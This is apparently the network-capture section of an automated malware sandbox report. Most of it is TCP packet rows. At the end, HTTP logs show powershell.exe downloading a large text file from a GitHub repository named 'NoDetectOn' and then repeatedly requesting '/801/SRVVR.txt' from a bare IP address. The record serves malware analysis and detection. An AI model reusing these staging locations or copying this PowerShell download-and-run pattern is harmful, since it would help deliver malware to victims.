                            Oct 2, 2024 05:22:08.871258020 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.871274948 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.871311903 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.958945036 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.958981991 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.959119081 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.959125996 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.959152937 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.959183931 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.959825039 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.959855080 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.959918022 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.959923983 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.959935904 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.959989071 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.960791111 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.960822105 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.960910082 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.960910082 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.960916042 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.960988998 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.961815119 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.961836100 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.961901903 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.961908102 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.962038994 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.962646008 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.962668896 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.962729931 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.962735891 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.962829113 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.962829113 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.963438988 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.963459015 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.963536024 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.963536024 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.963541985 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.963551998 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.963584900 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.963591099 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.963604927 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.963618994 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.963673115 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.964405060 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.964432001 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.964471102 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.964476109 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:08.964489937 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:08.964519024 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.048357010 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.048379898 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.048466921 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.048475027 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.048526049 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.048851967 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.048872948 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.048913956 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.048921108 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.048954964 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.048973083 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.049628973 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.049650908 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.049688101 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.049693108 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.049736023 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.049902916 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.049923897 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.049978971 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.049989939 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.050033092 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.050033092 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.052011967 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.052032948 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.052092075 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.052098036 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.052134991 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.052154064 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.052478075 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.052500010 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.052532911 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.052541018 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.052563906 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.052580118 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.054300070 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.054387093 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.054387093 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.054400921 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.054440022 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.055155039 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.055210114 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.055212021 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.055232048 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.055273056 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.302434921 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.302462101 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.302556992 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.302565098 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.302709103 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.302942991 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.302959919 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.303010941 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.303015947 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.303061008 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.303129911 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.303147078 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.303210974 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.303216934 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.303226948 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.303258896 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.303958893 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.303973913 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.304069996 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.304084063 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.304095984 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.304109097 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.304137945 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.304177046 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.304939032 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.304955959 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.304996967 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.305001974 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.305023909 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.305027008 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.305049896 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.305078983 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.305084944 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.305113077 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.306787014 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.306811094 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.306843996 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.306855917 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.306876898 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.310201883 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.310220003 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.310256958 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.310267925 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.310300112 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.310317039 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.310329914 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.310450077 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.310450077 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.310458899 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311075926 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311095953 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311125040 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.311130047 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311161041 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.311181068 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311196089 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311238050 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.311244965 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311259031 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.311836004 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311855078 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311891079 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.311897993 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.311909914 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.312263012 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.312282085 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.312318087 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.312324047 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.312349081 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.312453032 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.312475920 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.312505007 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.312510967 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.312527895 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.312541962 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.312551022 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.312597990 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.312602997 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.320975065 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321007013 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321042061 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.321048975 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321079016 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.321342945 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321357012 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321397066 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.321403027 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321414948 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.321634054 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321676016 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321691036 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.321697950 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321731091 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.321924925 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321939945 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.321975946 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.321983099 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.322012901 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.322622061 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.322635889 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.322700977 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.322706938 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.322722912 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.322962046 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.322976112 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.323010921 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.323018074 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.323040009 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.323575974 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.323591948 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.323627949 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.323633909 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.323652029 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.324368954 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.324384928 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.324430943 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.324438095 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.324449062 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.332806110 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.335663080 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.411834955 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.411864996 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.411981106 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.412003994 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412055016 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.412297964 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412316084 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412363052 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.412369013 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412424088 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.412559986 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412575006 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412617922 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.412625074 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412662983 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.412909985 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412935972 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.412981033 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.412987947 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.413022995 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.413546085 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.413563013 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.413604021 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.413610935 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.413645983 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.413880110 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.413897991 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.413932085 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.413938046 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.413968086 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.413983107 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.414362907 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.414378881 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.414407969 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.414416075 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.414443016 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.414459944 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.415076971 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.415092945 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.415129900 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.415137053 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.415159941 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.415179014 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.463057995 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.502465010 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.502489090 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.502568960 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.502576113 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.502625942 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.502784014 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.502799988 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.502850056 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.502856016 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.502885103 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.502904892 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.503199100 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.503217936 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.503261089 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.503267050 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.503303051 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.503320932 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.503654003 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.503671885 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.503722906 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.503729105 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.503772974 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.504013062 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.504029036 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.504081011 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.504087925 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.504129887 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.504470110 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.504487038 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.504532099 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.504539967 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.504553080 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.504580021 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.504620075 CEST44349699185.199.108.133192.168.2.7
                            Oct 2, 2024 05:22:09.504667044 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.517683029 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:09.543020010 CEST49699443192.168.2.7185.199.108.133
                            Oct 2, 2024 05:22:10.104120970 CEST4970080192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:10.108988047 CEST8049700172.232.184.131192.168.2.7
                            Oct 2, 2024 05:22:10.109129906 CEST4970080192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:10.109241962 CEST4970080192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:10.114092112 CEST8049700172.232.184.131192.168.2.7
                            Oct 2, 2024 05:22:31.475883007 CEST8049700172.232.184.131192.168.2.7
                            Oct 2, 2024 05:22:31.475959063 CEST4970080192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:31.483493090 CEST4970080192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:31.484148979 CEST4970680192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:31.490170956 CEST8049700172.232.184.131192.168.2.7
                            Oct 2, 2024 05:22:31.490185976 CEST8049706172.232.184.131192.168.2.7
                            Oct 2, 2024 05:22:31.490266085 CEST4970680192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:31.490390062 CEST4970680192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:31.496620893 CEST8049706172.232.184.131192.168.2.7
                            Oct 2, 2024 05:22:52.881206989 CEST8049706172.232.184.131192.168.2.7
                            Oct 2, 2024 05:22:52.881490946 CEST4970680192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:52.881546974 CEST4970680192.168.2.7172.232.184.131
                            Oct 2, 2024 05:22:52.886305094 CEST8049706172.232.184.131192.168.2.7
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 2, 2024 05:22:06.575728893 CEST5587953192.168.2.71.1.1.1
                            Oct 2, 2024 05:22:06.582674026 CEST53558791.1.1.1192.168.2.7
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Oct 2, 2024 05:22:06.575728893 CEST192.168.2.71.1.1.10x28f3Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Oct 2, 2024 05:22:06.582674026 CEST1.1.1.1192.168.2.70x28f3No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                            Oct 2, 2024 05:22:06.582674026 CEST1.1.1.1192.168.2.70x28f3No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                            Oct 2, 2024 05:22:06.582674026 CEST1.1.1.1192.168.2.70x28f3No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                            Oct 2, 2024 05:22:06.582674026 CEST1.1.1.1192.168.2.70x28f3No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                            • raw.githubusercontent.com
                            • 172.232.184.131
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749700172.232.184.131807728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            Oct 2, 2024 05:22:10.109241962 CEST78OUTGET /801/SRVVR.txt HTTP/1.1
                            Host: 172.232.184.131
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.749706172.232.184.131807728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            Oct 2, 2024 05:22:31.490390062 CEST78OUTGET /801/SRVVR.txt HTTP/1.1
                            Host: 172.232.184.131
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749699185.199.108.1334437728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            2024-10-02 03:22:07 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                            Host: raw.githubusercontent.com
                            Connection: Keep-Alive
                            2024-10-02 03:22:07 UTC906INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 2935468
                            Cache-Control: max-age=300
                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                            Content-Type: text/plain; charset=utf-8
                            ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                            Strict-Transport-Security: max-age=31536000
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: deny
                            X-XSS-Protection: 1; mode=block
                            X-GitHub-Request-Id: 9D15:3A4BF6:1706DDC:18C7EAB:66FCBC5F
                            Accept-Ranges: bytes
                            Date: Wed, 02 Oct 2024 03:22:07 GMT
                            Via: 1.1 varnish
                            X-Served-By: cache-ewr-kewr1740033-EWR
